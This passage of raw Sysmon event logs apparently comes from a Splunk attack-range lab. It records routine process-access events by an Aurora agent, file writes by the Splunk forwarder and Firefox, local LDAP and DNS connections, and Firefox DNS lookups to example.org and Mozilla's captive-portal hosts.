Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000044310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.572{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CED3A795D650B415E3C6624E7A98703,SHA256=77555A8475C0B23B37FBF00CF7850D27939F5FBB5CECBBBC9F2FB4434BFFCD32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.337{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.336{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.186{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017021Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:55.680{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39720882DC63AE2B5D5598BFCA2F6614,SHA256=3EEA3222CB04F59F636C4E1F0206DAFD896272A9B7BE137E8C3E12F229CCFEDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:55.970{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F55CD8CB32A67FB15C83505E2094B27,SHA256=602ED43B9EC7CF331C74D341C32C0172E73CBB8A76849F2C605CE1FE184B80DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:55.868{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=597B84DBAE01CA5D6586659A01101F8B,SHA256=A5E92A6592EC838AC71F91306CD8202DA3C9889572EBB05443B5E76E25A6E128,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017020Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:53.926{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50118-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000044342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:55.015{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:55.012{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:55.010{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:55.007{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:55.005{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:55.002{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:55.000{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000017022Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:56.769{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF951F62F9A4DE25D0065887300A4830,SHA256=F7F5FB04B915E34D236BF441C81402AEC54E548386687519C50D9E5FCEA95E06,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.329{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56381-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000044345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.329{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56381-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000017023Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:57.858{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2DFCAFC505A0661AA39BD64D9AD9E96,SHA256=DFF3714B44618833C7DC29CD8E1990184C87F08CBC54155C5EFD12F3E0D5D2AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:57.004{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F5B9BBA0AFB53E61456470EB565D891,SHA256=1C492599C87F21DF640A15E699031176109D9D095472C28696F63616942A8C17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017024Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:58.939{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EF1A5107779F8AC6ED43A8C649B552A,SHA256=F6C12903F49B8312CEFDA2DDC82D3A504A1AB219B40617A5E367EBF374856CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:58.957{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\session-state.jsonMD5=2B4F4AADCFE29536AE66B9E65A38D008,SHA256=F5D4C31043ADB6C775089D7D4B6A670387A1274994039D45FE6ACE9E389B8DCF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:56.665{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56382-false10.0.1.12-8000- 23542300x800000000000000044348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:58.090{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DBFC20F53F1F5BD514BED8D2D3B2835,SHA256=15CF8C71BF848F75CFFCC376D32005FDDA16D3824D94D26BCDD27853E27B6F43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:59.956{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=5F8B38F59CA72DC6DE26602D93684CAB,SHA256=BA6998476EE900440F967AD324841AC8D6F1C8D308564F81BA0C19000E144E9D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:59.209{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F080262D0C6EE9DFAE4CF58319467941,SHA256=68E035D31A08C383A62496CC31745EBE9DCB5EDF09A476133F2A5F10D8269171,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:59.109{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\e167157c-9b00-4d2f-b610-30f69de3c1dcMD5=99AD88328359105E821770E2864314FE,SHA256=EDA2644CA39347ABCC7FE62B80D94C0F3426BC2F2ADA8BDEA51BC501D21991FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:59.109{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\3388e058-0cb9-4d5b-8ac6-6d1e9236663eMD5=EDE63EE1CAE1E39B1CE94C1BEEBA3090,SHA256=A9B3715437DAA196210F928F209E266BBD8160D939B914610160B17B4F0D0021,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:58.993{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_3afc23b5-8880-435a-aab1-b20b8f892d11.jsonMD5=9C0D29E42242F191C04E71AAE0E3757A,SHA256=6A3427587F2E48AAC146E727D379FC8E3F0B71454B46F06D2DE3A15421F70F8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017026Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:58.973{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50119-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017025Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:00.049{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DC71D51D5E4E66B54B5AD634AD02D14,SHA256=E16A872B6D4DFB413C524D84D4DF897AAF10D84491F61989A97EF0CAB4C2C9E3,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000044362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:58.745{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240example.org0::ffff:93.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000044361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:58.732{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.detectportal.prod.cloudops.mozgcp.net02600:1901:0:38d7::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000044360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:58.732{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.detectportal.prod.cloudops.mozgcp.net034.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000044359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:58.731{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;::ffff:34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 354300x800000000000000044358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:58.718{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58646- 354300x800000000000000044357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:58.455{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59214- 23542300x800000000000000044356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:00.177{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDC6DF7CC24C1DD5F4639E96F926A21B,SHA256=12A992C3AB44BBBD335261CF521E7DAE8815B0ED59C0502DD89FA8317D25A456,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017028Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:01.453{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=87D18C51C46AA263587AF9B33A222DD9,SHA256=864AE5AFE2508CF322E5845104770CEEB3940003C3005EFB925F1CA4B08F66DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017027Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:01.130{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A05703AF852D661192F93A0B57D02D6,SHA256=26DD5A361046AF07CF595E54B37F8989899346082402221F026967CF2C27B20D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:01.299{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F2DFEABFF8EE5565CBC7A32F0F04B52,SHA256=0F3F3494BB81EEC56E6B591BF064091AE067DE85A85696248E21897A8737ED1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017060Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.772{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017059Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.767{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017058Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:02.764{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program 